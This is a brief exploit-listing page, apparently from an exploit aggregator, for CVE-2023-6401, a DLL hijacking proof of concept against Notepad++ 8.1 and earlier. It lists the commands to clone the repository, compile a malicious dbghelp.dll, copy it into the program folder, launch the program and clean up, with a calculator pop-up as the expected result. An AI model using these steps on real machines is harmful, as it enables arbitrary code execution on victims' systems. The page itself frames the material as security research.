## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MEKITOCI-CVE-2023-6401
# CVE-2023-6401 · DLLハイジャック概念実証
 
英語 | 中国語
* * *
## 中国語
> ⚠️ **重要な声明:セキュリティ研究および教育目的のみに使用してください**
NotePad++ ≤ 8.1 DLLハイジャック脆弱性の概念実証。アプリケーションディレクトリに悪意のある `dbghelp.dll` を配置することで任意のコードを実行します。
### クイックスタート
root@kitploit:~
# 下載專案
git clone https://github.com/mekitoci/CVE-2023-6401.git
# 進入專案目錄
cd CVE-2023-6401-main
# 編譯DLL
# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows
# 部署到NotePad++目錄
copy dbghelp.dll "C:\Program Files\Notepad++\"
# 執行測試
"C:\Program Files\Notepad++\notepad++.exe"
# 立即清理
del "C:\Program Files\Notepad++\dbghelp.dll"
**期待される結果:** 電卓が起動 + メッセージボックス表示 + NotePad++が正常に起動